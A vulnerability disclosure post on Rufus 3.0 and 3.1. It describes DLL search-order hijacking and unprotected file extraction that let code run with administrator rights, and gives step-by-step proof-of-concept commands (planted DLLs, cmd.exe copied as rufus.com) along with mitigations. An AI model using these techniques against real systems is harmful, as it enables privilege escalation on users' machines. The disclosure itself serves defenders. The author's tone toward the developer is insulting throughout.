Rufus 3.0 / 3.1 Privilege Escalation

`Hi @ll,  
  
like their predecessors, the recently (2018-05-29, 2018-06-19)  
published versions 3.0 and 3.1 of "Rufus" are riddled with bloody  
beginners errors, which ALL allow arbitrary code execution WITH  
escalation of privilege, in MULTIPLE ways.  
  
JFTR: to support and ease further attacks, this crap is built  
without ASLR and without stack cookies/canaries!  
<https://msdn.microsoft.com/en-us/library/bb430720.aspx>  
  
  
Vulnerability #1  
================  
  
rufus-3.0.exe, rufus-3.0p.exe, rufus-3.1.exe and rufus-3.1p.exe are  
susceptible to DLL spoofing alias DLL search order hijacking: on a  
fully patched Windows 7, they load at least the following Windows  
system DLLs from their "application directory", typically the user's  
"Downloads" directory %USERPROFILE%\Downloads\, instead from Windows  
"system directory" %SystemRoot%\System32\, resulting in arbitrary  
code execution:  
  
DWMAPI.dll, UXTheme.dll, Version.dll, CryptSP.dll, NCrypt.dll,  
BCrypt.dll, RichEd20.dll, DSRole.dll, LogonCli.dll, DFSCli.dll,  
SAMCli.dll, DSRole.dll  
  
  
For this well-known and well-documented vulnerability see  
<https://cwe.mitre.org/data/definitions/426.html> and  
<https://cwe.mitre.org/data/definitions/427.html> plus  
<https://capec.mitre.org/data/definitions/471.html>.  
  
Additionally see Microsoft's developer guidance  
<https://technet.microsoft.com/en-us/library/2269637.aspx>,  
<https://msdn.microsoft.com/en-us/library/ff919712.aspx>,  
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> und  
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>  
to avoid this bloody beginner's error.  
  
Also see  
<https://insights.sei.cmu.edu/cert/2008/09/carpet-bombing-and-directory-poisoning.html>  
and  
<http://blog.acrossecurity.com/2012/02/downloads-folder-binary-planting.html>  
plus  
<https://insights.sei.cmu.edu/cert/2016/06/bypassing-application-whitelisting.html>  
for "prior art".  
  
And last but not least the 20+ year old  
<http://fy.chalmers.se/~appro/nt/nsaguide.pdf>  
  
  
Since the clueless developer specified "requireAdministrator" in  
the embedded application manifest, his crap can only be run with  
administrative privileges, resulting in arbitary code execution  
WITH escalation of privilege.  
  
  
Demonstration/proof of concept #1:  
----------------------------------  
  
1. Follow the instructions from  
<https://skanthak.homepage.t-online.de/minesweeper.html>  
and build a testbed/minefield of 32-bit DLLs in your  
"Downloads" directory.  
  
2. Download <https://rufus.akeo.ie/downloads/rufus-3.0.exe> and  
<https://rufus.akeo.ie/downloads/rufus-3.0p.exe> and save them  
in your "Downloads" directory.  
  
3. Run rufus-3.0.exe and rufus-3.0p.exe: notice the message boxes  
displayed from multiple DLLs created in step 1!  
  
4. Download <https://rufus.akeo.ie/downloads/rufus-3.1.exe> and  
<https://rufus.akeo.ie/downloads/rufus-3.1p.exe> and save them  
in your "Downloads" directory.  
  
5. Run rufus-3.1.exe and rufus-3.1p.exe: notice the message boxes  
displayed from at least DSROLE.DLL created in step 1!  
  
  
JFTR: if you don't see a message box: open the event log and view  
the entries from source "Vulnerability and Exploit Detector".  
  
  
Fix:  
~~~~  
  
DUMP the executable installer, DUMP the portable crap, provide an  
.MSI, or a .CAB plus an .INF script.  
  
Mitigations:  
~~~~~~~~~~~~  
  
See <https://skanthak.homepage.t-online.de/!execute.html>  
  
  
Vulnerability #2  
================  
  
Although running with administrative privileges, this crap extracts  
files UNPROTECTED [1] into the "current working directory" for later  
execution (and into the user's %TEMP% directory for later use).  
  
For this well-known and well-documented vulnerability see  
<https://cwe.mitre.org/data/definitions/377.html> and  
<https://cwe.mitre.org/data/definitions/379.html> plus  
<https://capec.mitre.org/data/definitions/29.html>  
  
An unprivileged user/process running in the same user account [2]  
can modify the extracted files between their creation and use, and  
can even create bogus files instead, which this crap then executes.  
Remember that it runs with administrative rights!  
  
  
Demonstration/proof of concept #2a:  
-----------------------------------  
  
1. Open a command prompt, then run the following command lines:  
  
MKDIR "%SystemDrive%\CRAPWARE"  
COPY %COMSPEC% rufus.com  
ATTRIB.exe +R rufus.com  
  
2. Run the following command line:  
  
"%USERPROFILE%\Downloads\rufus-3.1.exe"  
  
Notice the string "rufus.com\n" pasted into the command prompt  
window (really: into the window which happens to have focus) and  
the copy of the command processor started.  
  
3. Run the following command line:  
  
"%USERPROFILE%\Downloads\rufus-3.1p.exe"  
  
Again notice the string "rufus.com\n" pasted into the command  
prompt window, and the subsequent dialog box stating that  
another instance of this crap is already running.  
  
  
Demonstration/proof of concept #2b:  
-----------------------------------  
  
1. Run the following command lines in the still open command  
prompt:  
  
ATTRIB.exe -R rufus.com  
ERASE rufus.com  
SET NoDefaultCurrentDirectoryInExePath=*  
  
2. Run the command lines  
  
"%USERPROFILE%\Downloads\rufus-3.1.exe"  
"%USERPROFILE%\Downloads\rufus-3.1p.exe"  
  
3. Notice the error messages  
  
| "rufus.com" is not recognized as an internal or external command,  
| operable program or batch file.  
  
from the command prompt, and the complete failure of this crap.  
  
  
Demonstration/proof of concept #2c:  
-----------------------------------  
  
1. Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of  
files in this directory for everyone, inheritable to files in  
subdirectories" to the current working directory  
%SystemDrive%\CRAPWARE.  
  
2. Run the vulnerable applications: notice their complete failure,  
they neither display their window nor any error message!  
  
3. View the access rights of the file "rufus.com" created in the  
CWD.  
  
  
stay tuned, and FAR AWAY from such vulnerable and defective crap  
Stefan Kanthak  
  
  
[1] on Windows, every developer past absolute beginner uses the  
fourth argument of CreateFile()  
<https://msdn.microsoft.com/en-us/library/aa363858.aspx>  
or the second argument of CreateDirectory()  
<https://msdn.microsoft.com/en-us/library/aa363855.aspx>  
to specify a "security descriptor" with the desired and needed  
access rights, at least and especially when running privileged.  
  
[2] the ONE and ONLY user account created during Windows setup is an  
administrator account, and it is used by the vast majority of  
Windows users for their everyday work: according to Microsoft's  
own telemetry data, as published in their "Security Intelligence  
Reports" <https://www.microsoft.com/security/sir/default.aspx>  
about 1/2 to 3/4 of all (some 600 million) Windows installations  
report only one active user account.  
  
  
`